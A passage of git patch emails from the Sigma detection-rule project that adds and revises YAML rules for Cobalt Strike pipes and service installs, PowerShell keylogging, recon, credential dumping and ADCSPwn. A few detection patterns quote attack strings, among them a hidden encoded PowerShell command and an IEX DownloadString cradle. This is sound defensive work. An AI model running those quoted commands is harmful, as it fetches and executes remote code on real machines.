category: pipe_created + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.' +detection: + selection_malleable_profiles: + PipeName|startswith: + - '\mojo.5688.8052.183894939787088877' + - '\mojo.5688.8052.35780273329370473' + - '\mypipe-f' + - '\mypipe-h' + - '\ntsvcs_' + - '\scerpc_' + condition: 1 of them +falsepositives: + - Chrome instances using the exactly same name pipe named mojo.something +level: high From 096395a49ac6910b6a437963cb3e4f04c8485d98 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 30 Jul 2021 07:19:42 +0200 Subject: [PATCH 0142/1367] fix: one condition style error --- .../pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml index 47711bc8..c9a3da84 100644 --- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml @@ -23,7 +23,7 @@ detection: - '\mypipe-h' - '\ntsvcs_' - '\scerpc_' - condition: 1 of them + condition: selection_malleable_profiles falsepositives: - Chrome instances using the exactly same name pipe named mojo.something level: high From eff6b50a8994fd5e11f6b4ae5293b5c35febc44f Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 30 Jul 2021 08:15:13 +0200 Subject: [PATCH 0143/1367] add process_creation_susp_recon.yml --- .../process_creation_susp_recon.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_susp_recon.yml diff --git a/rules/windows/process_creation/process_creation_susp_recon.yml b/rules/windows/process_creation/process_creation_susp_recon.yml new file mode 100644 index 00000000..c0cd5a8d --- /dev/null +++ b/rules/windows/process_creation/process_creation_susp_recon.yml @@ -0,0 +1,27 @@ +title: Recon Information for Export with Command Prompt +id: aa2efee7-34dd-446e-8a37-40790a66efd7 +status: experimental +author: frack113 +date: 2021/07/30 +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md +tags: + - attack.collection + - attack.t1119 +logsource: + product: windows + category: process_creation +detection: + selection_image: + Image|endswith: + - '\tree.com' + - '\WMIC.exe' + - '\doskey.exe' + - '\sc.exe' + selection_redirect: + ParentCommandLine|contains: ' > %TEMP%\' + condition: selection_image and selection_redirect +falsepositives: + - Unknown +level: medium From 38ede57cb40e614094828b05bed46dfa721f3757 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 30 Jul 2021 08:20:51 +0200 Subject: [PATCH 0144/1367] add powershell_suspicious_recon.yml --- .../powershell_suspicious_recon.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/powershell/powershell_suspicious_recon.yml diff --git a/rules/windows/powershell/powershell_suspicious_recon.yml b/rules/windows/powershell/powershell_suspicious_recon.yml new file mode 100644 index 00000000..78368cdf --- /dev/null +++ b/rules/windows/powershell/powershell_suspicious_recon.yml @@ -0,0 +1,29 @@ +title: Recon Information for Export with PowerShell +id: a9723fcc-881c-424c-8709-fd61442ab3c3 +status: experimental +author: frack113 +date: 2021/07/30 +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md +tags: + - attack.collection + - attack.t1119 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection_eventid: + EventID: 4104 + selection_action: + ScriptBlockText|contains: + - 'Get-Service ' + - 'Get-ChildItem ' + - 'Get-Process ' + selection_redirect: + ScriptBlockText|contains: '> $env:TEMP\' + condition: all of them +falsepositives: + - Unknown +level: medium From 5947dddcd29b4e38205b63b2d8f5615f9c198c22 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 30 Jul 2021 08:24:06 +0200 Subject: [PATCH 0145/1367] feat: print the faulty rule as an error into cmdline --- tests/test-merge.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/tests/test-merge.sh b/tests/test-merge.sh index 0e5075eb..86dc48d0 100755 --- a/tests/test-merge.sh +++ b/tests/test-merge.sh @@ -7,6 +7,7 @@ do echo -n . if ! $COVERAGE run -a --include=tools/* tools/merge_sigma $f > /dev/null then + echo "[ERROR] Error in file $f" exit 1 fi done From ab16490d330e7ba72f25262cfce84ea6889143d7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 30 Jul 2021 08:24:41 +0200 Subject: [PATCH 0146/1367] fix: re CS rule --- .../sysmon_mal_cobaltstrike_re.yml | 31 +++++++++---------- 1 file changed, 15 insertions(+), 16 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index 1d4cb892..97b9e587 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -15,22 +15,21 @@ logsource: category: pipe_created definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.' detection: - selection_re: - PipeName|re: - - '\\mojo\.5688\.8052\.183894939787088877[0-9a-f]{2}' - - '\\mojo.5688.8052.35780273329370473[0-9a-f]{2}' - - '\\wkssvc[0-9a-f]{2}' - - '\\ntsvcs[0-9a-f]{2}' - - '\\DserNamePipe[0-9a-f]{2}' - - '\\SearchTextHarvester[0-9a-f]{2}' - - '\\mypipe-f[0-9a-f]{2}' - - '\\mypipe-h[0-9a-f]{2}' - - '\\windows.update.manager[0-9a-f]{2}' - - '\\windows.update.manager[0-9a-f]{3}' - - '\\ntsvcs_[0-9a-f]{2}' - - '\\scerpc_[0-9a-f]{2}' - - '\\scerpc[0-9a-f]{2}' - condition: selection_re + selection: + - PipeName|re: '\\mojo\.5688\.8052\.183894939787088877[0-9a-f]{2}' + - PipeName|re: '\\mojo\.5688\.8052\.35780273329370473[0-9a-f]{2}' + - PipeName|re: '\\wkssvc[0-9a-f]{2}' + - PipeName|re: '\\ntsvcs[0-9a-f]{2}' + - PipeName|re: '\\DserNamePipe[0-9a-f]{2}' + - PipeName|re: '\\SearchTextHarvester[0-9a-f]{2}' + - PipeName|re: '\\mypipe\-f[0-9a-f]{2}' + - PipeName|re: '\\mypipe\-h[0-9a-f]{2}' + - PipeName|re: '\\windows\.update\.manager[0-9a-f]{2}' + - PipeName|re: '\\windows\.update\.manager[0-9a-f]{3}' + - PipeName|re: '\\ntsvcs_[0-9a-f]{2}' + - PipeName|re: '\\scerpc_[0-9a-f]{2}' + - PipeName|re: '\\scerpc[0-9a-f]{2}' + condition: selection falsepositives: - Unknown level: critical From e33ec91b9aec51868d6ea0d3275a1abb353af428 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 30 Jul 2021 08:28:19 +0200 Subject: [PATCH 0147/1367] add powershell_keylogging.yml --- .../powershell/powershell_keylogging.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/powershell/powershell_keylogging.yml diff --git a/rules/windows/powershell/powershell_keylogging.yml b/rules/windows/powershell/powershell_keylogging.yml new file mode 100644 index 00000000..a3e3679e --- /dev/null +++ b/rules/windows/powershell/powershell_keylogging.yml @@ -0,0 +1,29 @@ +title: Powershell Keylogging +id: 34f90d3c-c297-49e9-b26d-911b05a4866c +status: experimental +author: frack113 +date: 2021/07/30 +description: Adversaries may log user keystrokes to intercept credentials as the user types them. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1 +tags: + - attack.collection + - attack.t1056.001 +logsource: + product: windows + service: powershell + definition: EnableScriptBlockLogging must be set to enable +detection: + selection_id: + EventID: 4104 + selection_basic: + ScriptBlockText|contains: 'Get-Keystrokes' + selection_high: # want to run in backgroud and keybord + ScriptBlockText|contains|all: + - 'Get-ProcAddress user32.dll GetAsyncKeyState' + - 'Get-ProcAddress user32.dll GetForegroundWindow' + condition: selection_id and (selection_basic or selection_high) +falsepositives: + - Unknown +level: medium From dfa28944d04d7615908c1b09e986123555a8e7a5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 30 Jul 2021 08:31:37 +0200 Subject: [PATCH 0148/1367] update ref in sysmon_creation_mavinject_dll.yml --- .../windows/process_creation/sysmon_creation_mavinject_dll.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml b/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml index c55cfa29..b0a3401c 100644 --- a/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml +++ b/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml @@ -6,9 +6,12 @@ date: 2021/07/12 description: Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md tags: - attack.defense_evasion + - attack.collection - attack.t1218 + - attack.t1056.004 logsource: category: process_creation product: windows From ccaffc79f7c5be8aec26bce30310d3ec82cc751c Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 30 Jul 2021 08:40:21 +0200 Subject: [PATCH 0149/1367] update ref win_susp_psr_capture_screenshots.yml --- .../process_creation/win_susp_psr_capture_screenshots.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/win_susp_psr_capture_screenshots.yml b/rules/windows/process_creation/win_susp_psr_capture_screenshots.yml index cae1a0a4..aa550b3e 100644 --- a/rules/windows/process_creation/win_susp_psr_capture_screenshots.yml +++ b/rules/windows/process_creation/win_susp_psr_capture_screenshots.yml @@ -5,6 +5,7 @@ description: The psr.exe captures desktop screenshots and saves them on the loca references: - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Psr.yml - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md author: Beyu Denis, oscd.community date: 2019/10/12 modified: 2020/08/28 From 9131ed6db513faf8697964560358e27d8353f37f Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Fri, 30 Jul 2021 12:36:05 +0545 Subject: [PATCH 0150/1367] Added rule for Cabinet file expansion --- .../sysmon_expand_cabinet_files.yml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 rules/windows/process_creation/sysmon_expand_cabinet_files.yml diff --git a/rules/windows/process_creation/sysmon_expand_cabinet_files.yml b/rules/windows/process_creation/sysmon_expand_cabinet_files.yml new file mode 100644 index 00000000..8b9f3f8b --- /dev/null +++ b/rules/windows/process_creation/sysmon_expand_cabinet_files.yml @@ -0,0 +1,34 @@ +title: Cabinet File Expansion +status: experimental +id: 9f107a84-532c-41af-b005-8d12a607639f +author: Bhabesh Raj +date: 2021/07/30 +description: Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack +references: + - https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll +tags: + - attack.execution + - attack.t1218 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: + - '\expand.exe' + CommandLine|contains: + - '.cab' + - '/F:' + - 'C:\ProgramData\' #Suspicious paths to curb FPs if any + - 'C:\Public\' + - '\AppData\Local\Temp\' + - '\AppData\Roaming\Temp\' + condition: selection +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - System administrator Usage +level: medium \ No newline at end of file From 917b95d8ffdf81bb7e93b3aa5b80f3a996a72bd3 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 30 Jul 2021 08:51:38 +0200 Subject: [PATCH 0151/1367] fix: bash script bug --- tests/test-merge.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/test-merge.sh b/tests/test-merge.sh index 86dc48d0..14dadf71 100755 --- a/tests/test-merge.sh +++ b/tests/test-merge.sh @@ -7,7 +7,7 @@ do echo -n . if ! $COVERAGE run -a --include=tools/* tools/merge_sigma $f > /dev/null then - echo "[ERROR] Error in file $f" + echo "[ERROR] Error in file " $f exit 1 fi done From f9aff7d4037726b042871af2a11a9538b952cd0c Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 30 Jul 2021 16:02:38 +0200 Subject: [PATCH 0152/1367] fix product sysmon_apt_sourgrum.yml --- rules/windows/process_creation/sysmon_apt_sourgrum.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/sysmon_apt_sourgrum.yml b/rules/windows/process_creation/sysmon_apt_sourgrum.yml index 1a6c50cd..5cfbb594 100644 --- a/rules/windows/process_creation/sysmon_apt_sourgrum.yml +++ b/rules/windows/process_creation/sysmon_apt_sourgrum.yml @@ -9,14 +9,15 @@ references: - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/SOURGUM_IOC.yaml - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ date: 2021/06/15 +modified: 2021/07/30 tags: - attack.t1546 - attack.t1546.015 - attack.persistence - attack.privilege_escalation logsource: + product: windows category: process_creation - product: sysmon detection: selection1: Image|contains: 'windows\system32\Physmem.sys' From 6cd2e26fa0023878718752f7fc44f688f349d48c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 30 Jul 2021 16:54:29 +0200 Subject: [PATCH 0153/1367] rule: WinDivert driver load --- .../sysmon_vuln_dell_driver_load copy.yml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 rules/windows/driver_load/sysmon_vuln_dell_driver_load copy.yml diff --git a/rules/windows/driver_load/sysmon_vuln_dell_driver_load copy.yml b/rules/windows/driver_load/sysmon_vuln_dell_driver_load copy.yml new file mode 100644 index 00000000..b462fc2f --- /dev/null +++ b/rules/windows/driver_load/sysmon_vuln_dell_driver_load copy.yml @@ -0,0 +1,26 @@ +title: WinDivert Driver Load +id: 679085d5-f427-4484-9f58-1dc30a7c426d +status: experimental +description: Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows +author: Florian Roth +date: 2021/07/30 +references: + - https://reqrypt.org/windivert-doc.html + - https://rastamouse.me/ntlm-relaying-via-cobalt-strike/ +tags: + - attack.collection + - attack.defense_evasion + - attack.t1599.001 + - attack.t1557.001 +logsource: + category: driver_load + product: windows +detection: + selection: + ImageLoaded|contains: + - '\WinDivert.sys' + - '\WinDivert64.sys' + condition: selection +falsepositives: + - legitimate WinDivert driver usage +level: high From a04aa6ac49b0f72dd0735c135be635fd07c7aad5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 31 Jul 2021 10:18:21 +0200 Subject: [PATCH 0154/1367] rule: ADCSPwn --- .../process_creation/win_hack_adcspwn.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/windows/process_creation/win_hack_adcspwn.yml diff --git a/rules/windows/process_creation/win_hack_adcspwn.yml b/rules/windows/process_creation/win_hack_adcspwn.yml new file mode 100644 index 00000000..fcaa5c41 --- /dev/null +++ b/rules/windows/process_creation/win_hack_adcspwn.yml @@ -0,0 +1,22 @@ +title: ADCSPwn Hack Tool +id: cd8c163e-a19b-402e-bdd5-419ff5859f12 +description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service +author: Florian Roth +references: + - https://github.com/bats3c/ADCSPwn +date: 2021/07/31 +tags: + - attack.credential_access + - attack.t1557.001 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - ' --adcs ' + - ' --port ' + condition: selection +falsepositives: + - unlikely +level: critical From bda207660d70f2169ab522986b5a8b1d2b7077c9 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 31 Jul 2021 12:51:42 +0200 Subject: [PATCH 0155/1367] refactor: modified CobaltStrike service install rule --- .../win_cobaltstrike_service_installs.yml | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index 9834aee8..d764e1af 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml @@ -4,8 +4,9 @@ description: Detects known malicious service installs that appear in cases in wh author: Florian Roth, Wojciech Lesicki references: - https://www.sans.org/webcasts/119395 + - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ date: 2021/05/26 -modified: 2021/06/03 +modified: 2021/07/31 tags: - attack.execution - attack.privilege_escalation @@ -17,18 +18,24 @@ logsource: product: windows service: system detection: - selection1: + selection_id: EventID: 7045 - selection2: + selection1: ServiceFileName|contains|all: - 'ADMIN$' - '.exe' - selection3: + selection2: ServiceFileName|contains|all: - '%COMSPEC%' - 'start' - 'powershell' - condition: selection1 and (selection2 or selection3) + selection3: + ServiceFileName|contains: + - 'powershell -nop -w hidden -encodedcommand' + selection4: + ServiceFileName|contains|base64offset: + - "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" + condition: selection_id and (selection1 or selection2 or selection3 or selection4) falsepositives: - Unknown level: critical From 186583f78f3d690840f2269d1e3cbdb460c3b203 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 1 Aug 2021 16:14:51 +0200 Subject: [PATCH 0156/1367] fix the output not the core --- tools/sigma/backends/elasticsearch.py | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 81b367a5..409b0e33 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -1370,9 +1370,15 @@ class ElastalertBackend(DeepFieldMappingMixin, MultiRuleOutputMixin): def finalize(self): result = "" + rule_lst = [] for rulename, rule in self.elastalert_alerts.items(): - result += yaml.dump(rule, default_flow_style=False, width=10000) - result += '\n' + filter_data = rule['filter'] + if filter_data in rule_lst: + pass + else: + result += yaml.dump(rule, default_flow_style=False, width=10000) + result += '\n' + rule_lst.append(filter_data) return result class ElastalertBackendDsl(ElastalertBackend, ElasticsearchDSLBackend): From 359dd6bbb86b720d4e792a332c4969ccb78e43dc Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 1 Aug 2021 19:34:07 +0200 Subject: [PATCH 0157/1367] fix my code --- tools/sigma/backends/elasticsearch.py | 14 ++++---------- tools/sigma/sigmac.py | 28 ++++++++++++++++++++++----- 2 files changed, 27 insertions(+), 15 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 409b0e33..b00a1107 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -300,6 +300,7 @@ class ElasticsearchQuerystringBackend(DeepFieldMappingMixin, ElasticsearchWildca return result else: return super().generateSubexpressionNode(node) + class ElasticsearchQuerystringBackendLogRhythm(DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin, SingleTextQueryBackend): """Converts Sigma rule into Lucene query string for LogRhythm. Only searches, no aggregations.""" identifier = "es-qs-lr" @@ -365,8 +366,7 @@ class ElasticsearchQuerystringBackendLogRhythm(DeepFieldMappingMixin, Elasticsea return result else: return super().generateSubexpressionNode(node) - - + class ElasticsearchEQLBackend(DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin, SingleTextQueryBackend): """Converts Sigma rule into EQL.""" identifier = "es-eql" @@ -1370,15 +1370,9 @@ class ElastalertBackend(DeepFieldMappingMixin, MultiRuleOutputMixin): def finalize(self): result = "" - rule_lst = [] for rulename, rule in self.elastalert_alerts.items(): - filter_data = rule['filter'] - if filter_data in rule_lst: - pass - else: - result += yaml.dump(rule, default_flow_style=False, width=10000) - result += '\n' - rule_lst.append(filter_data) + result += yaml.dump(rule, default_flow_style=False, width=10000) + result += '\n' return result class ElastalertBackendDsl(ElastalertBackend, ElasticsearchDSLBackend): diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 50196933..0da400c2 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -33,6 +33,7 @@ from sigma.backends.base import BackendOptions from sigma.backends.exceptions import BackendError, NotSupportedError, PartialMatchError, FullMatchError from sigma.parser.modifiers import modifiers import codecs +import copy sys.stdout = codecs.getwriter('utf-8')(sys.stdout.detach()) @@ -249,11 +250,9 @@ def main(): parser = SigmaCollectionParser(f, sigmaconfigs, rulefilter, sigmafile) results = parser.generate(backend) - nb_result = len(list(parser.generate(backend))) - if nb_result > 1 : - inc_filenane = 0 - else: - inc_filenane = None + nb_result = len(list(copy.deepcopy(results))) + inc_filenane = None if nb_result < 2 else 0 + newline_separator = '\0' if cmdargs.print0 else '\n' for result in results: @@ -275,6 +274,25 @@ def main(): print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) exit(ERR_OUTPUT) print(result, file=out, end=newline_separator) + + if nb_result == 0: # elastalert return "results=[]" so get a error with out not def + if not fileprefix == None and not inc_filenane == None: #yml action + try: + filename = fileprefix + str(sigmafile.name) + filename = filename.replace('.yml','_' + str(inc_filenane) + filename_ext) + inc_filenane += 1 + out = open(filename, "w", encoding='utf-8') + except (IOError, OSError) as e: + print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) + exit(ERR_OUTPUT) + elif not fileprefix == None and inc_filenane == None: # a simple yml + try: + filename = fileprefix + str(sigmafile.name) + filename = filename.replace('.yml',filename_ext) + out = open(filename, "w", encoding='utf-8') + except (IOError, OSError) as e: + print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) + exit(ERR_OUTPUT) except OSError as e: print("Failed to open Sigma file %s: %s" % (sigmafile, str(e)), file=sys.stderr) From 97d2dc89a875ff2269f57ca83aa1c31fb283a335 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 2 Aug 2021 00:25:09 +0200 Subject: [PATCH 0158/1367] fix: order of modifiers --- rules/windows/builtin/win_cobaltstrike_service_installs.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index d764e1af..5285feef 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml @@ -33,7 +33,7 @@ detection: ServiceFileName|contains: - 'powershell -nop -w hidden -encodedcommand' selection4: - ServiceFileName|contains|base64offset: + ServiceFileName|base64offset|contains: - "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" condition: selection_id and (selection1 or selection2 or selection3 or selection4) falsepositives: From 0efe69bd363a7210b61cbfb168258269c8561682 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 3 Aug 2021 08:30:26 +0200 Subject: [PATCH 0159/1367] add poweshell_detect_vm_env.yml --- .../powershell/poweshell_detect_vm_env.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/powershell/poweshell_detect_vm_env.yml diff --git a/rules/windows/powershell/poweshell_detect_vm_env.yml b/rules/windows/powershell/poweshell_detect_vm_env.yml new file mode 100644 index 00000000..2e30001f --- /dev/null +++ b/rules/windows/powershell/poweshell_detect_vm_env.yml @@ -0,0 +1,31 @@ +title: Powershell Detect Virtualization Environment +id: d93129cd-1ee0-479f-bc03-ca6f129882e3 +status: experimental +author: frack113 +date: 2021/08/03 +description: | + Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. + This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md + - https://techgenix.com/malicious-powershell-scripts-evade-detection/ +tags: + - attack.defense_evasion + - attack.t1497.001 +logsource: + product: windows + service: powershell + definition: EnableScriptBlockLogging must be set to enable +detection: + selection_id: + EventID: 4104 + selection_action: + ScriptBlockText|contains: Get-WmiObject + selection_module: + ScriptBlockText|contains: + - MSAcpi_ThermalZoneTemperature + - Win32_ComputerSystem + condition: all of selection_* +falsepositives: + - Unknown +level: medium \ No newline at end of file From b5e4b04cb5f72819aceaa7f7af4d8c18c24f7f7e Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 3 Aug 2021 10:04:15 +0200 Subject: [PATCH 0160/1367] fix eventid 400 powershell-classic --- .../powershell_alternate_powershell_hosts.yml | 8 +++---- ...powershell_delete_volume_shadow_copies.yml | 6 ++--- .../powershell_remote_powershell_session.yml | 22 ++++++++++++++----- 3 files changed, 21 insertions(+), 15 deletions(-) diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index 6346854c..dcf6fb16 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -4,7 +4,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: experimental date: 2019/08/11 -modified: 2021/06/01 +modified: 2021/08/03 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -31,8 +31,7 @@ logsource: service: powershell detection: selection: - EventID: - - 4103 + EventID: 4103 ContextInfo: '*' --- logsource: @@ -40,6 +39,5 @@ logsource: service: powershell-classic detection: selection: - EventID: - - 400 + EventID: 400 ContextInfo: '*' \ No newline at end of file diff --git a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml b/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml index ed6e4d16..b899f3a9 100644 --- a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml +++ b/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml @@ -11,6 +11,7 @@ tags: status: experimental author: frack113 date: 2021/06/03 +modified: 2021/08/03 logsource: product: windows service: powershell-classic @@ -24,10 +25,7 @@ detection: - 'Delete()' - 'Remove-WmiObject' selection_eventid: - EventID: - - 400 - - 403 - - 600 + EventID: 400 condition: selection_obj and selection_del and selection_eventid fields: - CommandLine diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index 80f74507..f2b4587a 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -1,3 +1,4 @@ +action: global title: Remote PowerShell Session id: 96b9f619-aa91-478f-bacb-c3e50f8df575 description: Detects remote PowerShell sessions @@ -14,17 +15,26 @@ tags: - attack.lateral_movement - attack.t1021.006 - attack.t1028 #an old one +falsepositives: + - Legitimate use remote PowerShell sessions +level: high +--- logsource: product: windows service: powershell detection: selection: - EventID: - - 4103 - - 400 + EventID: 4103 HostName: 'ServerRemoteHost' HostApplication|contains: 'wsmprovhost.exe' condition: selection -falsepositives: - - Legitimate use remote PowerShell sessions -level: high +--- +logsource: + product: windows + service: powershell-classic +detection: + selection: + EventID: 400 + HostName: 'ServerRemoteHost' + HostApplication|contains: 'wsmprovhost.exe' + condition: selection \ No newline at end of file From 85b88c7646d06498fff06e9878a33eace801753d Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Tue, 3 Aug 2021 15:06:27 +0545 Subject: [PATCH 0161/1367] Added rule for pypykatz --- ...sysmon_pypykatz_cred_dump_lsass_access.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/process_access/sysmon_pypykatz_cred_dump_lsass_access.yml diff --git a/rules/windows/process_access/sysmon_pypykatz_cred_dump_lsass_access.yml b/rules/windows/process_access/sysmon_pypykatz_cred_dump_lsass_access.yml new file mode 100644 index 00000000..fa39b72f --- /dev/null +++ b/rules/windows/process_access/sysmon_pypykatz_cred_dump_lsass_access.yml @@ -0,0 +1,28 @@ +title: Credential Dumping by Pypykatz +id: 7186e989-4ed7-4f4e-a656-4674b9e3e48b +description: Detects LSASS process access by pypykatz for credential dumping. +status: experimental +date: 2021/08/03 +author: Bhabesh Raj +references: + - https://github.com/skelsec/pypykatz +tags: + - attack.credential_access + - attack.t1003.001 +logsource: + category: process_access + product: windows +detection: + selection: + TargetImage|endswith: '\lsass.exe' + CallTrace|contains|all: + - 'C:\Windows\SYSTEM32\ntdll.dll+' + - 'C:\Windows\System32\KERNELBASE.dll+' + - 'libffi-7.dll' + - '_ctypes.pyd+' + - 'python3*.dll+' # Pypy requires python>=3.6 + GrantedAccess: "0x1FFFFF" + condition: selection +level: critical +falsepositives: + - Unknown \ No newline at end of file From 644fe807869f97d257003346af99887221ad2e2c Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 3 Aug 2021 16:01:54 +0200 Subject: [PATCH 0162/1367] add powershell_timestomp.yml --- .../powershell/powershell_timestomp.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/powershell/powershell_timestomp.yml diff --git 